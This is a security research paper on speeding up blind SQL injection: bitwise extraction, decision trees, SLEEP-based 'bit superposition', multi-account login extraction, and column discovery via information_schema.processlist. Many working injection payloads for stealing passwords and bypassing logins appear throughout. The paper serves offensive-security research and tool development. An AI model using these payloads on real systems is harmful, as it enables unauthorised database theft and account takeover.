[05-04-2021] High Speed Methods For Blind SQL Injections Ruben Piña http://nzt-48.org @tr3w_ Abstract ======== This paper presents optimization methods for exceptionally fast information extraction with blind SQL injections. These methods involve implementing a wide variety of ideas such as using inferential algorithms that request only certain fragments of the information and deduce the missing data (which work 100% of the time with any given data-type), decision-making algorithms, techniques for avoiding the use of semaphores in multiple thread execution contexts, injections that reach and extract data right away without the need to know the names of the tables and columns of the database schema, tricks for obtaining multiple values of information at once with only 1 blind request and a new authentication bypass technique. Implementing these methods within carefully crafted code has resulted in the development of the fastest tools in the planet to extract information through Blind SQL Injection vulnerabilities. These tools are around 100% faster than the currently most popular tool (sqlmap). The nature of such attack vectors will be explained in this paper, including all of their intrinsic details. Keywords: Web Application Security, Blind SQL Injection, Optimization 1. Introduction ================ Usually, extracting data from a database through blind SQL injections requires performing a high number of requests, which results in a time-consuming task. This paper will focus on thoroughly optimized injection methods that accelerate the data extraction process. The objective is to change and evolve the different kinds of classic injections and discover better ones. For instance, the most popular tool for extracting information through SQL Injections, sqlmap, takes around 5 seconds to retrieve ten 32-byte hashed password. In contrast, one of the methods explained in this paper takes less than 1 second to retrieve the same information. Another method explained in this text takes more or less 3 seconds. The inner workings of these new extraction techniques are explained in this document. 2. Attack vectors ================== 2.1 Overview of methods that have been documented so far 2.1.1. Bisection, the most used method so far. One of the most used techniques to extract information from a database using blind SQL injection attacks is the bisection method. This technique makes use of a binary search algorithm with which is possible to retrieve any character within the ASCII range with a maximum of 7 requests, according to the sqlmap documentation [1]. To extract a character within the UTF-8 Latin range it would take a maximum of 8 requests. This method has threading limitations because the requests must be performed in a sequential manner; in order to know how to forge the following request the attacker needs to know what was the result of the previous request. For this reason, implementing threads in the extraction tool is always limited because there are always requests that can’t be performed in a parallel fashion. 2.1.2. The change of paradigm Usually, performing blind SQL injections relies on guesswork that gathers Boolean responses from the vulnerable application in order to narrow down the possibilities of what the desired character might be. A very useful paradigm to optimize this old technique is the realization that everything inside the machine is binary. From the same perspective, it can be concluded that all the information stored in the computer is, in essence, Boolean. So instead of trying to guess what the character might be, it is easier to convert all the information into its binary representation and then just ask directly for TRUE and FALSE answers bit by bit. Bits which are set are equal to TRUE responses and unset bits are the equivalence of FALSE responses. By gathering all of these Boolean responses, it is possible to reconstruct the exact bit strings used to represent each character of the information desired to be extracted. This idea of extracting information in its binary representation can be implemented in many different ways, as demonstrated in various blog posts and text files[3][4][5][6], but it is not known who came up with this idea. 2.1.3. sql-anding, former fastest method for boolean blind SQL injections Back in 2013, new SQL Injection optimization techniques were presented in Black Hat USA by Roberto Salgado[8]. One of these techniques was created by me. It would be helpful to explain this technique in order to yield a better comprehension of the new methods explained later in further sections. The code of the injection is the following: 1 AND (SELECT ASCII(MID(password, n, 1))FROM users LIMIT 1) & %d The first thing this injection does is to select a single character from the desired value to extract by using the MID function. The next thing done by this injection is to convert the selected character to its ASCII numeric value by using the ASCII function. The last part of the injection performs an AND bitwise operation against %d, a placeholder that will iterate through 7 different values: %d = [ 1, 2, 4, 8, 16, 32, 64 ] The binary representations of these values are the following: 1 = 00000001 2 = 00000010 4 = 00000100 8 = 00001000 16 = 00010000 32 = 00100000 64 = 01000000 128 = 10000000 Since all of these numbers are powers of 2, all the bits are unset except for only one bit that is set and shifts its position to the left with each different value. The desired character to extract (being ‘a’ in this case, with a binary value of 01100001) is used to perform an AND bitwise operation with each one of the previously listed powers of 2: 01100001 01100001 01100001 01100001 00000001 00000010 00000100 00001000 ======== ======== ======== ======== 00000001 00000000 00000000 00000000 = TRUE = FALSE = FALSE = FALSE 01100001 01100001 01100001 01100001 00010000 00100000 01000000 10000000 ======== ======== ======== ======== 00000000 00100000 01000000 00000000 = FALSE = TRUE = TRUE = FALSE If the vulnerable page responds with a TRUE response, then the bit being tested is equal to 1. If it is FALSE, the bit is equal to 0. By iterating through the mentioned powers of 2 and gathering the Boolean responses, all the bits which represent the desired character can be determined and used to reconstruct the bit string of the data being extracted. If it is known that the character being retrieved is contained in the ASCII range, only 7 requests need to be done because, for the ASCII range, the most significant bit is always 0. This technique has a huge advantage: in contrast to the bisection method, each bit can be retrieved regardless if the other bits are known or not, which means that these injections can be performed using threads to retrieve all the character’s bits at the same moment. This is the reason of why the sql-anding tool is much faster than other tools that use the binary search algorithm. There is already a recorded demo of this technique, publicly available to watch [7]. The query also runs faster in the DBMS since this injection uses bitwise operations instead of the BETWEEN instruction (used by the binary search algorithm). 2.1.4. Avoiding the need to use semaphores in multiple thread execution for maximum speed Retrieving information using the sql-anding technique is very fast if multiple threads are implemented in the extraction tool. Since 7 bits must be extracted to retrieve 1 character, sql-anding.py uses exactly 7 threads to simultaneously fetch each individual bit so that the entire bitstring is found in an instant. The 7 extracted bits need to be joined together in a single variable, so a semaphore would be required because the variable would be accessed simultaneously by multiple execution threads which could cause interference conflicts. However, the need to use a semaphore can be avoided, as demonstrated in the following code used in sql-anding.py: ------------------------------------------------------------------- powers_of_two = [ 0b0000001, 0b0000010, 0b0000100, 0b0001000, 0b0010000, 0b0100000, 0b1000000 ] injection = "1 AND(SELECT ASCII(MID(password,1,1)) & %d FROM users LIMIT 0,1)" % (powers_of_two[i]) result = inject(injection) bit = 1 if result else 0 global bitstring if bit: bitstring = bitstring | powers_of_two[i] -------------------------------------------------------------------- The array named powers_of_two[] is used in the injection to determine the value of each bit being extracted. The variable bitstring is where the retrieved bits are stored. Normally, a semaphore would need to be used in order to alter the bitstring variable because the simultaneous access to the same variable by different execution threads could cause problems. However, since each thread is meant to retrieve and store only 1 particular bit located in a different position than all of the other bits, multiple bitwise OR operations can be performed simultaneously with the same bitstring variable because the powers of two only affect 1 bit at a time and not the others; each thread only changes one particular bit without affecting the bits used by other threads. Without the pauses made by a semaphore, the speed of the algorithm can be increased. 2.1.5. Overview of pos2bin method pos2bin is another method which implements the idea of working with bits to extract information in a faster way. It was presented in Black Hat USA 2013 by Roberto Salgado [8]. For the sake of brevity, this method won’t be explained, but its functioning can be found in the slides used for the presentation [8]. Even though this method is very efficient, it has some constraints that make it inconvenient in certain situations. The main optimization idea used in this technique is to use reduced character sets to discard rarely used values so that the chances of finding commonly used characters is increased since not all characters are expected to be found in the data being extracted. This is highly useful when it is known that only digits or hexadecimal characters are expected. The problem is that if you want to consider the capability of finding any possible character, such as japanese, chineses, russian, korean, arabic or any other extense alphabet set (which coud include the latin alphabet as well), the character set becomes larger, which means that the idea behind the optimization of this technique becomes useles. Furthermore, another bold inconvenience of this technique is that for it to work, the server must be able to respond not only with a TRUE or FALSE response, but also with an ERROR response. So this is not a strictly boolean injection since 3 different types of content are needed to perform the extraction, which might make it impossible for it to work in some applications. 2.2 Explanation of new extraction methods 2.2.1 Duality: optimization of bit-based blind SQL injection methods The purpose of duality.py is to be able to optimize the bit extraction process without needing error-based responses. This is why it is possible to use Duality in every single vulnerable application, in contrast to pos2bin which doesn’t always work. Also, larger alphabets could be extracted without performing a ridiculously big injection containing the whole character set. Another difference Duality.py has in comparison with most bit-based techniques is that, based in the non-linear sequence of how some bits are requested, it is able to deduce the values of the remainding bits which never have to be requested, reducing the amount of injections; all 7-bits don’t need to be extracted. Sometimes it is even possible to get some characters by extracting only 1 or 2 bits and then inferring the values of the rest, getting exactly the correct strings 100% of the time. For maximum optimization, duality.py contains different decision-making trees which are chosen depending on the character set of the data being extracted, so that if a reduced character set is used (such as MD5 hashes), the task can be completed much faster. 2.2.1.1 Extracting Numbers It is going to be demonstrated how it is possible to extract a character by knowing just 1 or 2 of its bits. The easier example to explain how Duality does this is by assuming that the characters to be extracted contain only numbers. The extraction strategy is the following: The following table shows the binary representation of the ASCII values of all the numeric characters: Numeric character Binary representation --------------------------------------------- 0 0110000 1 0110001 2 0110010 3 0110011 4 0110100 5 0110101 6 0110110 7 0110111 8 0111000 9 0111001 It is apparent that the first 3 bits of the binary strings are always the same: ‘011’. Since this bitstring is present in all numbers, the first step is to neglect it so that only the last 4 bits remain Normally, each one of the 4 remaining bits would have to be extracted, but Duality, reduces the number of bits needed. This method starts by using the bitwise function BIT_COUNT() to determine how many bits are set in the character being extracted. This information is later used to decide what is the most optimum sequence to extract the bits of the desired character. Numeric character Binary BIT_COUNT ------------------------------------------------- 0 0000 0 1 0001 1 2 0010 1 3 0011 2 4 0100 1 5 0101 2 6 0110 2 7 0111 3 8 1000 1 9 1001 2 By using BIT_COUNT(), it becomes possible to classify all the characters into different groups depending on their quantity of set bits. This reduces the number of possible bit combinations to be found. For instance, if BIT_COUNT returns 3, it can be determined right away that the numeric character is ‘7’, because it is the only number which has a total of 3 set bits; only one request was made to find the character. Continuing with the example, if BIT_COUNT returns a value of 1 instead, the possibilities are reduced to the following characters: Numeric character Binary representation BIT_COUNT ----------------------------------------------------------------- 1 0001 1 2 0010 1 4 0100 1 8 1000 1 A good strategy would be to test the most significant bit. If it is set, then it would be revealed that the character is ‘8’, because it is the only character in this BIT_COUNT group whose most significant bit is set. The rest of the bits don’t need to be extracted anymore so only one more request had to be made to retrieve the character. If the bit is unset, the value ‘8’ can be discarded and the next step could be to test if the second most significant bit is set, because the only bitstring of this group whose second most significant bit is set is character ‘4’. This would reveal that the character is ‘4’ without the need to extract the rest of the bits. If the character is not ‘8’ nor ‘4’, the possible values left are ‘0001’ and ‘0010’. By retrieving the value of just the last bit, it would be revealed which one of these 2 remaining characters is the one being extracted. The sequence of how the bits are tested depends on the character range of the data wanted to be extracted. Duality’s code has multiple decision trees for the different BIT_COUNTs in each different character range (digits, hex, alpha, alnum, full-ascii). These decision-making trees have been optimized for each one of these specific cases by determining which sequences are the most likely to be encountered and what is the best way to identify unique patterns in the bitstrings in order to select and discard the optimum amount of bits. 2.2.1.2 Dealing with words When dealing with cases in which the data to be extracted consists of letters only, several optimization ideas can be used. The first thing to notice is that, for letter characters in the ASCII range, the first two significant bits are always ‘10’. These two bits can be removed from the bitstrings since their values are already known and only 5 bits of the bitstring will remain. The second thing to do is to use BIT_COUNT to find out how many of the last 4 bits are set. For instance, if the result of BIT_COUNT is 3, the possible characters would be reduced to the following ones: Character Binary representation BIT_COUNT --------------------------------------------------------- G 0 0111 3 K 0 1011 3 M 0 1101 3 N 0 1110 3 W 1 0111 3 It is evident that there is a sequence of bits that appears twice in the table: ‘0111’ is used to represent the characters ‘G’ and ‘W’. Since this is the only sequence that is repeated, it has the higher chance of happening, so this is the first possibility that should be tested. It is also evident that this sequence of bits is the only one whose second bit is ‘0’. This means that with only 1 request to extract the second bit, the 5 possibilities can be reduced to only 2 characters if the result is ‘0’, and just 1 more request would be needed to determine if the value is ‘G’ or ‘W’. This kind of logic can be used in every scenario to start testing for the most probable values, and then finding bit sequences that distinguish these characters from the rest to keep discarding the greatest amount of possibilities until the character in question is found with the least amount of requests. 2.2.1.3 Dealing with the full ASCII range In situations when it is needed to deal with the full ASCII range, the decision-trees must have routes to reach every possible combination of bits, in contrast with the character class specific scenarios where there are equal bit sequences at the start of the bitstrings. The decision tree used when the BIT_COUNT is equal to 2 is the following one: .---------------------. | BIT_COUNT = 0x02 | '---------------------' | | 0 <------------------------------R2#0---------------------------------> 1 | | | | v v R2H ----> 1 ----> 000011 R2H#0 | | | | v 0 <-------------'-----> 1 0 | | | | | | .-----R0#0 ----> 1 v v | | R0#0 R1#0 ---------> 1 | | | | | v v | | | R1L R0L 0 <-----'--> 1 v v .-------' | || | | R1L R1L v | 0 <-----'| v | | | 0 v | v R1L v | | | 1 | 1 | R0L | 0 <----'---> 1 | | | | | | 0 <-'---> 1 | | v v | v 0<-'-> 1 | | | | | 001001 000101 | 010001 | | | | | v v | | | | v | R0L R0L 100001 | | | 110000 | | | | | 0 <---| | | | | | | 1 | | | v | | | 001100 | | 001010 | | | v v | | v 101000 011000 v | 010010 000110 | | v 100010 The previous tree is used when the bitstring has 2 bits set. The tree extracts specific pairs of bits and then, based on the results it gets, other groups of bits are strategically selected with the objective of finding the quickest path to extract each possible value. When certain routes of the tree are taken, other possibilities are discarded. This also involves the idea of noticing which sequences of bits are repeated the most to know the probability of what characters are more likely to occur. This determine which bit-groups are more convenient to test first and next. This table lists every possible binary representation of every ASCII value whose BIT_COUNT is 2 (neglecting the most significant bit). The order in which they are listed has been rearranged to better distinguish repeated sequences, and they have been grouped in pairs: R0 R1 R2 ---------------------- 00 11 00 01 01 00 01 10 00 10 01 00 10 10 00 11 00 00 00 01 01 00 10 01 01 00 01 10 00 01 00 01 10 00 10 10 01 00 10 10 00 10 00 00 11 It is possible to notice that the bit sequence that appears the most is 00. Since it appears the same number of times in both R1 and R2 columns, one of these two columns should be tested first. The # operator used in the binary tree already shown basically converts every ‘11’ sequence into ‘00’ which means that the probability of finding the 00 sequence is increased. If the sequence found in R2 is indeed 00 (or 11), the possible values are reduced to the following: R0 R1 R2 ---------------------- 00 11 00 01 01 00 01 10 00 10 01 00 10 10 00 11 00 00 00 00 11 If R2 is not equal to 00, it means that the bitstring is 000011 because it is the only possibility left. If this is not the case, the sequences of groups R0 and R1 must be counted to see which values can be discarded next. The order of all the possible values left can be rearranged again to make it easier to find the relevant values: R0 R1 R2 ---------------------- 01 01 00 10 01 00 00 11 00 01 10 00 10 10 00 Group R0 is going to be tested next. If the extracted value is 00, it means that the entire bitstring is 001100, the only possibility left. If it is not, the remaining combinations in R0 are 10 and 01, by using one request to find one of those bits, the value of the remaining bit becomes revealed as well because both bits are mutually exclusive. This last step is repeated once again to find the value of the pair in R1. The core of the technique is to logically select specific groups of bits to deduce others. This table shows how many requests must be done for finding a character with the previous example (neglecting the BIT_COUNT): -------------------------------- 2 requests: 1 possibility 4 requests: 10 possibiilities 5 requests: 4 possibilities ---------------------------------- To emphasize the optimization it would be worth mentioning that sqlmap takes always 7 requests to find a character. So the worst case scenario of this method is even more convenient than sqlmap's best case scenario. 2.2.1.4 Binary Tree Inversion This is an example of another optimization technique that can be used when dealing with the full ASCII range. For instance. if the BIT_COUNT of a character is equal to 4, then it means that the possibility of finding a ‘1’ is of 4/6 and the possibility of finding a ‘0’ is 2/6; it is more probable to find a 1 than a 0, so in this specific case, looking for the location of the bits which are set is faster than looking for zeroes. If, in contrast, the BIT_COUNT of a character is equal to 2, then the possibility of finding a ‘1’ is equal to 2/6, meaning that it is more likely to find the location of bits equal to ‘0’ (4/6). To optimize the extraction process, the decision-tree used for when the BIT_COUNT is 4 can also be used in situations when BIT_COUNT is 2. The values of the bits should be inverted meaning that instead of having 4 bits with a value of ‘0’, the bits are going to be inverted leaving a total of 4 bits with a value of ‘1’, this way the probability of finding bits that are set will be increased, making the process faster and shorter, and once the set bits are found, the bits of the entire string will be inverted once again to obtain the original string of bits. In this way, the tree structures can be reused in different scenarios, making the code shorter. A quick test-case was made to determine the difference in requests and time when a normal tree is used against when the tree is inverted: Method Number of requests Time -------------------------------------------------- Normal tree 9090 71 seconds Tree inversion 8734 61 seconds 2.2.2. Bit superposition: returning 2 bits at once with only 1 injection Since each blind injection can only result in 1 of 2 possible boolean responses (TRUE or FALSE), it is assumed that it would be impossible to have 4 possible sequences of bits (00, 01, 10, 11) and determine with only 1 boolean response which one of the four sequences is being selected. Regardless of this belief, the author discovered a method for achieving this. It is possible to retrieve more than 1 bit at a time with only 1 boolean request. It works like this: ?id=1 AND (CASE WHEN (@:=(select mid(bin(ascii(mid(password,1,1))),1,2) from usuarios limit 1))='00' THEN 0 WHEN @='01' THEN 1 WHEN @='10' THEN (0 OR NOT SLEEP(0.5)) ELSE (1 AND NOT SLEEP(0.5)) END) If the bit sequence is ‘00’, the query returns FALSE. If the bit sequence is ‘01’, the query returns TRUE. If the bit sequence is ‘10’, the query returns FALSE but with a delay since a SLEEP is used. If the bit sequence is ‘11’, the query returns TRUE after a delay because of the SLEEP instruction. Even if the application can only reply with only 2 possible responses, 4 possible bit sequences can be found with just 1 injection. This technique has been implemented in duality.py for finding the number of set bits in a character. As shown in the following table, it does save a considerable amount of requests because the BIT_COUNT can be extracted with just one injection. Statistics for pos2bin are also included because it was the fastest method for a while. Test case: 5f4dcc3b5aa765d61d8327deb882cf99 Method Time Requests ----------------------------------------------- Duality 1 second 169 requests pos2bin 1 second 158 requests Duality with superposition 3 seconds 137 requests Test case: while i < 100: md5(i) Method Time Requests ----------------------------------------- Duality 125 seconds 16344 pos2bin 103 seconds 14816 Duality with superposition 297 seconds 13693 2.2.3. Taking Advantage Of Non-Boolean Blind SQL Injections OWASP (The Open Web Application Security Project) defines a blind SQL injection as the following: “Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response.”[8] The most common example of such kind of security flaw is a vulnerable login form that provides authentication functionality for a web application. Attacking this type of component is generally considered blind because only 2 types of boolean responses are possible: the user either logs in, or not. However, this paper presents a method to allow the data extraction process to become blatantly faster. Consider the following vulnerable code: $login = sql_query("SELECT * FROM users where user='$username'") In addition to bypassing the login, this vulnerability allows querying arbitrary data from the database by injecting logical operators into the statement which result in TRUE or FALSE responses (access granted or access denied) revealing information of the data being extracted. Nevertheless, the reality is that in most applications this isn’t a blind injection. Consider the following SQL injection: ' or user=(case when (@:=(select mid(password, 1, 1) from users limit 0,1))='A' then 'tr3w' when @='B' then 'hkm' when @='C' then 'lightos' end)# It is possible to test multiple conditions in only 1 request which causes the client to log in with different users depending on the result of the conditions. By determining which user was authenticated, it is possible to know which of the multiple condition was met. This injection demonstrates that the application can respond with not only one TRUE response, but actually multiple types of different TRUE responses. By being able to login with different users, it is possible to gather information faster by testing many conditions with just 1 request. This expands the attack surface increasing the quantity of different responses allowing to gather more information with only 1 injection. The number of possible conditions that can be used is limited by the amount of accounts the attacker can create. 2.2.4 Lightspeed for logins It would be a waste of resources to create a lot of accounts to test as many conditions as possible, not to mention the attack must first map every character in the set with a different response from the server. The method that will be presented in this section allows to retrieve big amounts of information with only 3 accounts needed, in contrast to cycling through the whole ASCII range which would need a total of 127 users. This is another implementation of the idea of converting the information into its binary representation and work with the bits that compose each extracted character. Think of the next collections of binary bits and their corresponding representation in decimal: Binary bitstring Decimal Representation ---------------------------------------------- 00 0 01 1 10 2 11 3 To perform this technique, the attacker must have control of 3 different accounts. In most cases this is an easy requirement because the attacker would just need to register 3 accounts with the same password. In cases where only one account is allowed (or maybe even without access to an account), the login makes it possible to take over 2 more accounts with a bypass injection. Consider the following vulnerable login already showed in the pr099407evious section of the document: $login = sql_query("SELECT * FROM users where user='$username'") The injection to attack this component, looks like this: ' or user=(case when(@:=(select mid(bin(mid(password, 1, 1),2,1) from users limit 0,1)) ='00' then 'tr3w' when @='01' then 'hkm' when @='10' then 'lightos' else '' end)# This injection starts by breaking out of the quote delimiter, leaving the column user with a blank string. Then, the character being extracted is converted into its binary representation and its first two bits are selected and stored in a variable (@). The next thing to be done is to test the variable with 4 different conditions. This means that all the possible permutations of 2 bits (00, 01, 10, 11) are tested with only 1 request in total until the sequence is matched. Finally, by seeing which account was authenticated, the sequence of bits is revealed. This process can be repeated to extract the next pair of bits until the whole binary string is reconstructed; the character is found with only 4 requests. If threads are used, the character can be retrieved in an instant. Notice that even if the attacker is using only 3 accounts, a fourth possibility can be tested thanks to the ELSE statement which provides a default value for when none of the conditions are met, which means that if the extracted set of bits is equal to '11', the login fails but the bitstring is revealed anyways. 2.2.4.2 The column name limitation It is important to mention that there is a relevant limitation when using this injection. To make this clear, it would be useful to see again the injection used by lightspeed: SELECT * FROM USERS WHERE user='' or user=(case when(@:=(select mid(bin(mid(password, 1, 1),2,1) from users limit 0,1))='00' then 'tr3w' when @='01' then 'hkm' when @='10' then 'lightos' else '' end)#' The column 'user' is part of the original query, but an additional condition for the same column must be injected by the attacker to specify which user is going to be logged-in depending on the condition met. In many cases, the attacker has no previous knowledge of what the column’s name may be. This is a problem because the attacker must know its name in order to use it in the injection. One already-known solution to find the column name is to blindly exploit the login mechanism to extract the column name one character at a time by consulting information_schema.columns. This can take a lot of time depending on the number of entries in the system tables. This is usually a slow and cumbersome task. Regardless, Lightspeed can highly optimize this process. 2.2.4.3 Fastest way to find the column name For lightspeed to work, the name of the column used in the query must be known in order to craft the injection. Lightspeed implements a fast straight-forward approach to discover the column name: instead of iterating through all the database entries in information_schema.tables for determining which table contains the column of interest and then iterating through all the entries in information_schema.columns to look for the column name among enormous heaps of entries, it is possible to skip this information gathering process and find out the column name right away with no knowledge at all about the structure of the database and with a minimum amount of requests, rendering the classic techniques slow and inefficient. The author found a way to achieve this by combining the use of regular expressions and subqueries to an esoteric table that was rarely used until Roberto Salgado, wrote the first blog post that talked about this table.[10] This is a screenshot of a query made to the just mentioned table: MariaDB [pwnage]> select info from information_schema.processlist; +-------------------------------------------------+ | info | +-------------------------------------------------+ | select info from information_schema.processlist | | NULL | | NULL | | NULL | | NULL | | NULL | +-------------------------------------------------+ 6 rows in set (0.049 sec) It is easy to notice that the first row returned by the query, is the query itself. This table doesn’t contain any other sensitive columns. But what if the query is merged with another query that contains sensitive columns? The concatenation of both queries would be displayed in the processlist table and the names of sensitive columns will be disclosed. Remember the vulnerable login query that has already been shown: SELECT user,password FROM USERS WHERE user='$username' If this query is injected with a subquery that consults information_schema.processlist, the whole SQL statement will be revealed along with the column names used by the authentication mechanism. MariaDB [pwnage]> SELECT password FROM usuarios WHERE usuario='' union select info from information_schema.processlist; +----------------------------------------------------------------------+ | password | +----------------------------------------------------------------------+ | SELECT password FROM usuarios WHERE usuario='' | | union select info from information_schema.processlist | | NULL | +----------------------------------------------------------------------+ 2 rows in set (0.002 sec) It is necessary to have in mind that, since the vulnerability is blind and the names of the resulting columns are not displayed in the content of the page, it is not possible to directly read the result of the query, so blind injection techniques must be used to extract these strings. Sometimes the columns needed by the attacker are not selected in the login query: SELECT * FROM users WHERE user='$username' In this SQL statement, the names of the selected columns are not used because the query is using the asterisk operator (*). This would mean that the column names must be obtained from a different place. Because of this, the first thing that the attacker must do is to figure out if the statement is using an asterisk operator (*) or if it is using explicit column names. The injection to do this looks like the following: SELECT * FROM USERS WHERE user='tr3w' and(select(trim(regexp_replace(regexp_substr( (select info from information_schema.processlist limit 0,1), 'select[[:space:]]+(.*?)from'),'(select|from)',''))))='*' The highlighted text shows that an injected subquery is consulting the info column of the processlist table so that the whole query can be selected. Next, the regular expression functions regexp_substr() and regexp_replace are used to select the part of the query where the asterisk (or the list of selected columns) would be found. Finally, at the end of the injection, a comparison is made to see if the selected content is an asterisk. If the application responds with TRUE, it is revealed that an asterisk is used indeed, meaning that the column names must be fetched from another place. If a FALSE response is returned, then it becomes apparent that column names can be extracted at the location matched by the regular expression. Then it becomes easy to use blind-based injections (just like Duality or sql-anding) to extract the column names with a minimum number of requests because the rest of the query has been discarded and neglected by the results of the regular expressions. Nevertheless, in many applications, the username column is not selected by the query, as in the following example: SELECT password FROM USERS WHERE user='$username' Only the password column is being selected, which might be of interest later on, but Lightspeed needs to know the name of the user column instead. This means that the name of the column must be extracted from somewhere else. The obvious place is after the WHERE keyword. The following injection works just like the previous one, with the difference that it attempts to fetch the column name from the conditional part of the query: SELECT password FROM USERS WHERE user='tr3w' and(select(trim(regexp_replace(regexp_substr((select info from information_schema.processlist limit 0,1), 'where[[:space:]]+(.*?)[[:space:]=]+'), '(where|[[:space:]]|=)',''))))#' Regular expressions are used to capture everything that is located between the WHERE keyword and the equal comparison sign (=). Duality and sql-anding can now be used to blindly extract the values captured by the regular expression, in hope that the desired column name is in there. Sometimes, more injections would need to be done because the desired column name might be located after a second or third (etc…) condition. The following injection works exactly as the the previous two, with the difference that it looks for the column name after AND clauses: SELECT password FROM USERS WHERE user='tr3w' and (select(trim(regexp_replace( regexp_substr((select info from information_schema.processlist limit 0,1), 'and[[:space:]]+(.*?)[[:space:]=]+'),'(and|[[:space:]]|=)',''))))#' The column name the attacker needs might be found with the three injections just shown, but to make the process as universal and complete as possible, it is convenient to assume that there might be cases in which the user column is not used in the query at all. The following injection demonstrates a method to extract the column name even if it is not being used in the query and without knowing anything at all about the structure of the database, directly reaching the group of desired columns with only one injection: SELECT password FROM USERS WHERE user='tr3w' and(select group_concat(column_name)from information_schema.columns where table_name=(select(trim(regexp_replace(regexp_substr ((select info from information_schema.processlist limit 0,1), 'from[[:space:]]+(.*?)+[[:space:]]'),'([[:space:]]|from|(.*?)\\.)','')))))#' The injection works by once again doing a subquery to information_schema.processlist so that the application’s original SQL statement can be selected. Regular expressions are used to isolate the table name used by the authentication query. Once the complete name of the table is selected and isolated, the only thing left to do is to consult information_schema.columns with this selection. At this point, the blind extraction process can begin to unveil the value of the desired column. Notice that the group_concat() clause is used to extract all the column names in a single row of results. An extra step taken by lightspeed is to use regular expressions to see if common patterns of column names match the query’s result. This can save a lot of requests because the values wouldn’t have to be extracted one character at a time. The way to do this is by simply using the REGEXP clause at the end of the query with common column names: ' and(select group_concat(column_name) from information_schema.columns where table_name =(select(trim(regexp_replace(regexp_substr((select info from information_schema.processlist limit 0,1),'from[[:space:]]+(.*?)+[[:space:]]'), '([[:space:]]|from|(.*?)\\.)',''))))) regexp '(username|user|login|email) If the application replies with a TRUE response, it means the regular expression was matched and the column name can be rapidly extracted with very few injections. Now that the column name is known, it is possible to launch lightspeed.py for fast data extraction through authentication mechanism. 2.2.5. Attack surface expansion methods lightspeed.py makes it possible to accelerate the extraction process by expanding the attack surface through the use of more available resources (such as different user accounts) to test multiple conditions at once, gathering more information per request as a result. This attack surface expanding idea can be implemented not only in login forms but in other components of the application as well. An online store is a good example of this; in the same way multiple accounts can be used, displaying multiple products stored in the database can also optimize the extraction process. A technique for extracting characters with just one request in their complete numeric representation has been around for some time now. The drawback of this technique is that for the possibility of extracting any character in the ASCII range, the online store must have at least 127 products so that each product represents each possible character; not to mention that 127 requests need to be made before the attack begins in order to map every character to its corresponding product. In most online stores, a single static resource is used to display one of many different products through the use of a GET parameter (such as an id) which identifies the product. The URI of such component might look like the following: /product.php?id=1 /product.php?id=2 /product.php?id=3 In vulnerable applications that work in this way, generally UNION SELECT statements are injected in an attempt to display data that the application is not meant to disclose. Nevertheless, if UNION statements are blocked, filtered or ignored, it means that the information must be extracted using blind SQL injection techniques, because it is impossible to explicitly read the information being extracted. If there are only 3 products in the store, this implies that in reality there are a total of 4 responses; applications commonly respond with different content when an invalid id is supplied, such as a division by zero. To begin the extraction, each different id number must be represented as a set of 2 bits: ?id= Binary representation ----------------------------- 0 00 1 01 2 10 3 11 These binary representations are all the possible permutations of a pair of bits. The attack is prepared by requesting the content of these 3 different products and storing either the complete response or, to save memory, a hash signature to represent it. Once these responses are gathered, the attack can begin. The traditional blind SQL injection is more or less structured in the following way: ?id=0 AND (SELECT… The core of this classic injection is the AND conditional operator. But what would happen if the conditional operator is replaced with a bitwise operator? Here’s an example: ?id=0 | (SELECT CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'),1,3),2,10) FROM users LIMIT 1) This injection uses an OR bitwise operator ( | ) and immediately after there’s a subquery. This subquery converts the value desired to extract into its binary representation and its first 2 bits are selected. The next step converts that pair of bits into its decimal representation and it is bitwise-ORed with the value assigned to the id GET parameter (which is zero). The value of the id GET parameter will be changed by the result of the bitwise operation, resulting in one of four different possibilities. By seeing which product is displayed, the value of the first two bits of the desired character are exposed. Then this process is repeated thrice with the next pairs of bits; the entire UTF-8 value can be obtained with just 4 requests. Since the pairs of bits are independent from the others, the tool can use threads to retrieve any character in an instant, without the use of semaphores (section 2.4), and with only 3 products in the database. 2.2.6. AND instead of OR If for some reason the bitwise OR cannot be used, an AND bitwise operation (&) works if the value assigned the GET parameter is equal to 3; it has all of its bits “on”, leaving the extracted bits unaffected due to the nature of bitwise AND. ?id=3 & (SELECT CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'),1,3),2,10) FROM users LIMIT 1) 2.2.7. Use in quote encapsulated parameters Even though it might appear that this method is only useful against numeric injections, it is also possible to use it with quoted parameters: ?id=' | (SELECT CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'),1,3),2,10) FROM users LIMIT 1) -- -' Some DBMS automatically cast strings into numbers in certain operations. 2.2.8. further optimization of lightspeed.py When facing a numeric injection, there is actually no need to perform a bitwise operation, we can shorten the injection to just select the bits we’re interested in and assign their decimal value to the requested GET parameter: http://vulnerable.com/?id=(SELECT CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'), 1,3),2,10)FROM users LIMIT 1) 2.8 The blind problem Despite the OWASP’s definition (cited earlier in this document) of what a Blind SQL injection is, some people argue that a strictly blind injection is when the query has no effect at all in the server’s response; in other words: the application always replies with the same content regardless of the query’s result. However, it is extremely rare to encounter scenarios that meet this condition. The most common ones are INSERT and UPDATE statements, and even in such cases, the injection is almost never blind because of the following reasons: When an INSERT statement is vulnerable to SQL injection, usually the attacker has to try sending multiple different injections with different numbers of values because it is very difficult to know in advance how many values must be inserted depending on the structure of the original query, so generally many invalid injections are sent until the correct query structure is found and the injection succeeds. All of these invalid queries usually cause the application to display an error message; This means that the query indeed had an effect on the server’s response, causing a notable difference in behavior. Also, even if the code of the vulnerable page is sloppy and doesn’t show any errors if the INSERT query fails, the attacker can consult other parts of the website that might reveal if the query was successful. For example, if a user account registration form is vulnerable to SQL injection and always responds with the same content regardless if the query was successful or not, usually there are pages where the user account information is displayed, such as a public or private profile, or by seeing if the user was registered. Because of this, in most cases, the query results are indeed visible; the injection isn’t really blind (according to the alternative strict definition some people have). This commonly happens with UPDATE statements as well. A situation in which an injectable INSERT statement is purely blind could be a logging mechanism. In the case of SELECT statements, encountering strictly blind scenarios is also extremely rare: The majority of web applications that perform SELECT queries containing user input, do it with the finality of displaying different dynamic content depending on the parameters sent by the user. Some examples of these types of applications are: - Online stores - Blogs - Logins - Forums - News websites - Articles websites etc... These include most web applications out there. It can be concluded that lightspeed works on a very big percentage of applications vulnerable to SQL injection. You can see a demo of this tool in action already available in youtube [9]. 